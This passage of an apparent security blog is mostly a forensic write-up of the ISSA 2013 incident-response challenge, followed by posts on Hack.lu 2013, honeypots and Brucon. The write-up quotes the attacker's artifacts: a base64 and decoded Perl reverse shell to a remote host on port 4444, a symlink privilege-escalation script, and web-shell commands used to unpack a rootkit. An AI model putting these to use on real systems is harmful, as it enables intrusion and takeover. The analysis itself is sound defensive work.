 issa-2013-challenge.pcap
 issa-2013-challenge.sda1.dd
 vmss.core  (not sure if this was part of the challenge, it doesn't appear to be)

Most of my work was done in Wireshark. I did run the packet capture through Foremost but that didn’t reveal to much. I also wrote a little code to help read some of the packet data, but that wasn’t really required.

Answering the questions

1. What time did the attack begin?

This would depend on what you consider an attack. I would say the attack began at the initialization of the Nikto scan. This happened at packet 21 in the pcap. Arrival time: feb 8th 2013 23:41 CET. There were a few ICMP echo requests before this packet, but I’d consider the Nikto scan the point at which simple recon became attack.

attackstart

2. What was the initial indicator?

A web scan from 58.64.132.100

3. What tool was used to scan the webserver?

Nikto v2.1.5

niktoscan

4. What application was exploited to compromise the webserver?

The TinyBrowser plugin for TinyMCE application that runs on Joomla. The attacker was able to upload an arbitrary file to the server which was then executed.

file_upload

5. What was the ip address of the attacker that compromised the webserver?

58.64.132.100

ipsummary

6. Were there any additional ip addresses used in the attack? If so, what are they?

58.64.132.141

ipsummary

7. What file was initially placed on the machine by the attacker

A php script “ogfcmxaiaexofkdozkvz.php”

Base64 encoded contents:

1
cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCI1OC42NC4xMzIuMTAwOjQ0NDQiKTtTVERJTi0+ZmRvcGVuKCRjLHIpOyR+LT5mZG9wZW4oJGMsdyk7c3lzdGVtJF8gd2hpbGU8Pjsn

And if we decode that little bit of Base64 we get this:

1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"58.64.132.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

So now we have a simple command and control system running to 58.64.132.100 on port 4444.

8. What directory was it located in?

/var/www/images/stories/

9. What allowed the upload of that file?

A vulnerability in the plugin for TinyMCE that allowed for arbitrary file uploads.

10. What was the first operating system command executed by the attacker?

ls

lscommand

11. How did the attacker attempt to escalate privileges?

Using a simple script called timeserver.bash.

timeserver

Contents:

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/bash
if [ $# -eq 0 ]; then
    echo "Usage: $0 /path/to/file"
    exit 1
fi
 
mkdir $HOME/backup 2> /dev/null
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)
mv $HOME/.cache/ $tmpdir 2> /dev/null
echo "\n@@@ File before tampering ...\n"
ls -l $1
ln -sf $1 $HOME/.cache
echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :)  File will then be owned by your user.  Try /etc/passwd...\n"

12. What was the timestamp that privilege escalation was attempted?

First attempt was at packet 23148, time: Feb 9th, 2013 00:37:05 CET Second attempt was at packet 23160, time: Feb 9th, 2013 00:37:50 CET

privesc

13. Is the machine still at risk for this method of privilege escalation? Why?

Yes, probably. The attack didn’t work because of a lack of permissions on the attempted directory. A simple change to the script and it may have worked.

privescfail

14. What files were placed on the webserver by the attacker?

ogfcmxaiaexofkdozkvz.php

timeserver.bash

webstats.txt

15. How was the attacker able to place each file on the machine?

ogfcmxaiaexofkdozkvz.php : file upload using TinyMCE

timeserver.bash : wget using shell from file upload

webstats.txt : wget using shell from file upload

16. What additional tool was placed on the machine that gave the attacker direct access?

webstats.txt (GET request at packet 23176) This is a simple C99 shell. Very common in this kind of attack. It allows almost full access to the affected server. They’re also pretty easy to detect.

The GET request for the shell

webstats

What the shell looks like when rendered in the browser

c99shell

17. How did the attacker access this tool?

GET request at packet 23340

getrequest

18. What did the attacker take from the webserver?

I can’t find any indication of any data being moved from the server. They attacker did manage to dump database information to file, but I can’t find anything to indicate that this was exfilled.

19: What are the md5 hashes of all the files taken?

Team sadface

20. What directory was created by the attacker?

/var/tmp/.www

21. What are the contents of this directory?

1
2
3
4
5
 > linux-rootkit.tar.gz
 > linux-rootkit
   \-> kontrol
   \-> kontrol.c
   \-> security.ko

22. Was the attacker able to successfully execute the tool in this directory? How do you know?

No, the attacker wasn’t able to execute the command. He attempted a number of times but wasn’t able to execute the file.

23. What was the exact netstat command that was executed at Fri Feb 08 2013 18:53:37? What ports were listening based on the output from that command?

netstat -nap Ports 22, 80 and 3306

Netstat command:

netstat

Listening ports:

listeningports

24. How was the attacker able to gain access to the database credentials?

The database user used for the Joomla installation was “root”. And the plain text password for this user was stored in the “configuration.php” file. The attacker could then use the mysqldump command to dump all the databases if he so desired

dbfail

25. List the points of remediation that need to occur as a result of the analysis performed.

  1. Ensure that all web applications are kept up to date.
  2. Ensure that the user used for database connections isn’t the root user 2.1 Ensure that the database user is only allowed to access the required application database
  3. Use a firewall to only allow the required connections both to and from the server.

There was also this rather interesting post from Spiderlabs. It may be a bit much to install and maintain, but it would probably have helped to detect this intrustion.

Extra credit stuff

Using Scapy to pull out the commands used:

I got a bit bored with looking through the HTTP posts so I wrote a little code to parse through the pcaps I’d identified with HTTP Posts in them.

http posts

It was probably a little long winded, but I extracted the individual packet number and wrote them to a pcap file. I then parsed through the packets and pulled out just the payloads. From there I did a little searching and pulled out just the lines (with the commands) I was interested in. The code is available here

Here’s the output of commands that was used by the attacker

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
act=cmd&cmd=pwd&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+-la+%2Fvar%2Fwww&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Fwww%2Fconfig.php&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Fwww%2Fconfig.php&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+%2Fvar%2Fwww&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+-la+%2Fvar%0D%0A&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mkdir+.&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mkdir+-p+%2Fvar%2Ftmp%2F.www&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mv+linux-rootkit.tar.gz+%2Fvar%2Ftmp%2F.www&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=tar+-tzvf+linux-rootkit.tar.gz&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=cat+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=tar-zxvf+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit.tar.gz&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=tar+-xzxvf+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit.tar.gz&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=mv+linux-rootkit+%2Fvar%2Ftmp%2F.www&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=chmod+755+%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=%2Fvar%2Ftmp%2F.www%2Flinux-rootkit%2Fkontrol&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=ls+-la+%2Fvar%2Ftmp%2F.www%2F&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1
act=cmd&cmd=which+gcc&d=%2Fvar%2Fwww%2Fimages%2Fstories%2F&submit=Execute&cmd_txt=1

We can see that the attacker pulled down a file “linux-rootkit.tar.gz” and untarred it to /var/tmp/.www He then attempted to run the “kontrol” file but this failed.

All in all this was a great little challenge. I could probably have automated a lot more of this, but I’m a little rusty when it comes to DFIR.

Hack.lu 2013

| Comments

Hack.lu 22-24th October

“We’re not computers, Sebastian, we’re physical.”

Comotion and I were invited to Hack.lu this year. Now in its ninth year, Hack.lu is a technical conference held each year in the little city of Luxembourg. Any conference that uses quotes from Bladerunner is a winner in my books.

Our Workshop: Protocol Exploration Workshop

This year we were invited to give our workshop on Scapy. The workshop looks at low level packetry and started as a gentlemans bet between myself and @blackswanburst one evening/morning on my balcony after probably a little too much good whisky. We look at performing a simple HTTP GET request to a web site, but only using Scapy. In this workshop we look at ARP, DNS and HTTP after some great feedback from when we gave the workshop at Brucon last month. We spent a little more time going through some of the basics of building packets and I think the class got a lot out of it. The pcaps, example code and slides for both presentations are available here. Any ideas, comments and feedback is definitely welcome.

Interesting Talks

* Debugging and Reversing the HTC Android Bootloader - Cedric Halbronn and Nicolas Hureau

I enjoyed this talk on reversing the HTC bootloader. The speakers gave a great breakdown the bootloader and how the whole ecosystem fits together. I’d have like a little more information on the reversing side, but that’s just me. The debugger they put together definitely looked cool and is something to look at if you’re into Android.

* Lockpicking and IT security - Walter Belgers

This was an interesting little talk. Yes, I did know about some of the information security stuff, but talking about similar problems in the physical/lock space was an interesting twist. The speaker knew his stuff and also knew how to present his content. Very entertaining talk.

* The Big Evil in Small Pieces - A malware Reverser’s Fairytale - Marion Marschalek

I really enjoyed this talk. Marion outlined how she reversed a particularly tricky piece of malware that was given as a challenge to female reversers. The content was well presented and I really liked the links at the end for further reading. Personally I think this talk would be better served as a workshop as there was a lot of very complicated (for me) content, most of which needed to be explored a little more thoroughly. If you’re into malware or reversing I’d recommend either checking out the video or slides for this talk.

* TCP Idle Scans in IPv6 - Mathias Morbitzer

Very cool talk about Idle scans on IPv6. Mathias went through the basics of Idle scans on IPv4 then proceeded to explain it for IPv6. The talk was well presented and very informative.

* Pearls of Cybercrime: malicious campaigns of year 2013 - Fyodor Yarochkin and Vladimir Kropotov

Interesting talk about badware as seen from the Russian perspective. There was a lot of information here and it was interesting to hear about badware from another point of view.

* Exploit Krawler Framework - Sebastien Larinier and Guillaume Arcas

Sebastien and Guillaume (good to finally meet you man :) ) gave a very cool talk on their framework for harvesting exploits and other fun stuff. It’s probably a little too complicated for my needs but it was well presented and something I’d look into when I have a little spare time.

Highlights

Some interesting stuff from the con…

* Suricata / Emerging Threats crew

The Suricata guys and girls were in attendance at the conference. They held workshops on both days with some interesting content. I have to say that they were an awesome bunch of people. So Matt, Trevor and the rest of the late night beer crew..thanks for great company.

* Fluxfingers CTF

Once again the FluxFingers crew ran the CTF event. And once again the CTF beat my n00b ass with a rather large bat. Yes, we probably should have pulled in all the Chaos Monkeys for this, but it was a last minute decision :) I love CTF’s where you have to learn stuff and think about things a different way. The challenge I enjoyed the most was the RoboAuth challenge. It seemed like a simple reversing challenge until it came to grabbing the second password. That’s where my butt was kicked rather hard.

Other peoples write ups are available here.

* Speakers dinner

After the conference on Wednesday all the speakers were herded into town for a rather awesome meal at a little Mexican place. It was a great evening with good food and cold beverages keeping us fueled. After which some brave souls (not me) decided to see what the town of Luxembourg had to offer. The rest of us returned to the bar to ensure that the population of beer didn’t get too high.

* Barcon / Hallwaycon

Barcon/Hallwaycon was awesome this year. After the day was finished most of the conference attendees ended up in the bar (as was our want). Great conversations and interesting discussions continued into the night (and early mornings) on most nights. Snickers and sandwiches were also liberated but that’s a story for another evening.

Wrap-up

Hack.lu is a smaller but awesome con. If it’s not on your list of “I must go here, drink beer and learn stuff” then it should be. Since starting with Brucon, I’ve been a huge fan of conferences where you can get one on one time with the speakers. More so if it can be done over a cold beer that doesn’t cost a small fortune. Smaller things like lightning talks, CTFs and dedicated workshop days also make the con a little more awesome.

See you next year.

On Honeypots

| Comments

Recently I came across this post on honeypots in the enterprise. It makes some good points but at the same time there are a few points that I disagree with. I also found it very telling that the Honeynet Project wasn’t mentioned at all. The poster said he had reached out to some of the projects higher ups and not gotten a response. Strange.

Anyway…here are my thoughts on the points made.

1. Low false positives, high success

Without giving concrete examples of what honeypots should be deployed for what end purpose, it’s difficult to say whether or not the false positive rate would be high or low. I’ve deployed a couple of Dionaea pots in various environments and the amount of noise generated by Conficker strains on this pot vastly outweighed any use given by the other options available with this particular honeypot. Any analyst looking after this honeypot would be hard pressed to find any useful information in the noise.

2. Able to confuse attackers

I’d say that yes, you’d confuse a certain type of attacker but given the availability of most honeypot software, any attacker worth his or her salt would be able to finger print and avoid any honeypot deployments in an environment. I remember an interview with Chris Nickerson and Lenny Zeltser on Exotic Liability the subject being very interesting. I’d agree with Chris that finding a honeypot on a network assessment would simply make me more interested in that particular network. I’d know that the guys looking after the network has at least a basic understanding of network security and this task of getting into his network isn’t going to be a simple walk in the park. Challenge accepted as it were. Yes, you will confuse basic attackers, but if anything you’re going to get the decent attackers more excited about your network. Which can’t be a good thing.

I do like the idea of honey tokens. More interesting is the concept of Honey Docs. I’d really like to spend a little more time play with this.

3. Only a time sink, if you allow it

Yeah, I have nothing here. These are good points to make. I might have mentioned that not all businesses are mature enough in the information security space to warrant putting up honeypots. I know I’ve deployed them in the past with many good intentions, but the intelligence they provided was only useful to me wanting to learn more about security rather than being of use to the business in question.

4. Help train your security team

Again, this would boil down to the maturity of the company. Given that a large percentage of companies are still failing at the basics and getting owned that way, a honeypot isn’t really going to help too much.

5. Many free options

Yes, there are many awesome free options available out there. But are they right for your company and will do provide useful intelligence ?

Side note

I found it strange that KFSensor was suggested. The price tag on the software isn’t too bad but there are so many great Open Source solutions available. It also looks like it hasn’t been updated in a while…but that may just be me being a bit picky.

Anyway. Please take this article as it was intended, with a large pinch of salt. I’m finding myself a little at odds with honeypots of late, but I put that down to being a bit of a grumpy bastard because of the 8 months of winter we have to endure here.

The guy who wrote the article clearly put effort into it and given the small Twitter conversation we had after my initial Tweet I’d say this is more me being a bit of a jerk than anything else.

Brucon 0x05

| Comments

Brucon celebrated its fifth year this year. And what a celebration it was. @blackswanburst and I headed out to Ghent a little early this year to help out with the three day training that went on. There were some very interesting classes taking place with everything from malware analysis to mobile penetration testing taking place.

Interesting talks

Alas we didn’t get much time to see that many talks. Eireann and I were still pretty busy preparing the slides and demo stuff for our workshop. More on that a little later. The great thing about Brucon is that being a smaller conference, you get to sit down with the main speakers and actually have a decent conversation with them. Something that’s just not possible at the bigger conferences. This was the case again this year with many beers and great talk (not all of it shop related) happening throughout the conference time.

When I did get a chance to sit down and digest a talk I really did enjoy these two talks:

Dan Guido - CEO of Trail of Bits

A very interesting look at crimeware kits and how they’re not really using cutting edge exploits that we sometimes think they are. Dan showed how his students with just a little training and guidance came up with more reliable exploits. He also highlighted how we suck at protecting end points. With just a little work on the end point, a lot of these exploits can and will be mitigated.

Russ Gideon - Paint by Numbers vs. Monet

This was a pretty interesting look at APT attacks and how they move laterally once inside a network. There was a good discussion around common tools and how we think they bypass detection with a little tweaking. This was shown to be false. It’s always interesting to get a little insight into how real world attacks happen and how the attackers do their thing. It seems to be an increasing theme within the industry to get pentesters to behave more like real attackers and less like simple tool jockeys. I know this isn’t the case with some of the better companies, but I also know that there are many places that are guilty of the “just rename this Nessus report and we’re done” deal.

Workshops

Christopher Lytle - Crypto by example

I was hoping to sit in on this workshop simply because crypto is not a strong point with me. Alas I got to the venue too late and the class was already overflowing. I also didn’t know that the class ran over both days. Live and learn I guess. Chris’ laptop blew up that night and he ended up giving the second days class on paper which he drew up from memory. Bad. Ass…

Lightning Talks

As with any conference, I wasn’t able to attend the first days lightning talks because it was at the same time as our workshop. I hear they went well and thankfully Wicked Clown wasn’t attending which meant someone else could win top prize :)

The second days lightning talks were also very good with a new interesting talks. I particularly enjoyed Marcs talk on abusing AWS EC2 machines using keys found through a quick and dirty search on Github. He threw together some pretty cool scripts which I’m hoping to get my hands on at some point in the future. Well done to Marc for winning day to. It was well deserved.

The After Party

IO Active put on quite a show for the attendees. Brucon and the organizers have always gone that extra mile to allow some information flooded geeks a little time to let their hair down. Fantastic music by DJ Jackalope, Count Ninjula and Keith Meyers blasted well into the night. Enough can’t be said about that night. And more shouldn’t be said by those that were there :)

Wrap Up

I’ve been to the last four Brucons now and each one has managed to outdo the last in terms of great speakers, awesome content and general awesome sauce. Wim, Clement, Marie, Seba and the whole volunteer crew know how to put on a great conference. I know I’m not alone in saying a big thank you to all of you. My only comment would be to get the workshops in the same building as the main conference. It’s a small pain in the butt to have to walk between the main conference hall and the workshop venue. I know this has always been a challenge for the Brucon crew and it’s not easy to get everything 100% right given the scope of the conference. As I’ve always said previously, if you have a chance to come to Brucon, do so…you won’t be disappointed.

I’d like to send a big thank you out to everyone who made this year another great Brucon for me. You know who you are.